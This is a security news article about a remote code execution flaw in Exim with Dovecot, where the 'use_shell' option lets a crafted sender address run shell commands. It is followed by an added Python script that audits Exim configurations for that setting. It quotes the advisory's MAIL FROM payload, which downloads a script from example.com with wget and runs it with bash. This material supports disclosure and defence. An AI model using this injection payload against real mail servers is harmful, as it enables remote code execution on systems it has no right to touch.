RedTeam Pentesting discovered a critical vulnerability in the Exim mail server when it works together with the Dovecot IMAP and POP3 server. A remote user can execute arbitrary code on the server if the software has been configured according to the recommendations on the project's wiki site.
To exploit the vulnerability, attackers need to send an email with a specially crafted sender address to the mail server. If the configuration of Exim used in tandem with Dovecot contains the «use_shell» option, the code placed in the address will be executed on the system.
The faulty configuration is found in many setup guides, as the erroneous option was first published on the official Dovecot website in 2009.
RedTeam Pentesting also provided an example of exploiting the vulnerability. Given the sender address «MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com», the mail server will execute the command «/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"», which launches wget and then executes the external script from example.com/test.sh.
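A configuration check for the setting described above, as an added example that is not part of the original article or the RedTeam Pentesting advisory: it reports Exim pipe transports that set «use_shell» and expand sender-controlled variables in their command. The sample transports and the list of variables treated as sender-controlled are constructed assumptions; without «use_shell», Exim runs the pipe command directly instead of through /bin/sh.

```python
import re

# Variables filled from SMTP input; this list is an assumption of the example.
TAINTED = re.compile(r"\$\{?(sender_address|local_part|h_|header_)")

# Constructed sample transports (not taken from any real server).
RISKY = r"""
begin transports
dovecot_deliver:
  driver = pipe
  command = /usr/lib/dovecot/deliver -e -k -s \
    -f "$sender_address"
  use_shell
"""
SAFER = RISKY.replace("  use_shell\n", "")  # same transport, no shell involved

def logical_lines(text):
    """Yield config lines without comments, joining backslash continuations."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
            continue
        yield buf + line
        buf = ""

def audit(text):
    """Return pipe transports that pass sender-controlled data through a shell."""
    transports, current, in_section = {}, None, False
    for line in logical_lines(text):
        if line.lower().startswith("begin "):
            in_section = line.split()[1].lower() == "transports"
            current = None
        elif in_section and re.fullmatch(r"\w+:", line):
            current = transports.setdefault(line[:-1], {})
        elif in_section and current is not None:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip() or "true"
    return [name for name, opts in transports.items()
            if opts.get("driver") == "pipe"
            and opts.get("use_shell", "false").lower() in ("true", "yes")
            and TAINTED.search(opts.get("command", ""))]

if __name__ == "__main__":
    print("risky:", audit(RISKY), "safer:", audit(SAFER))
```

Run `audit()` over the text of the live Exim configuration; any transport name it returns should have «use_shell» removed.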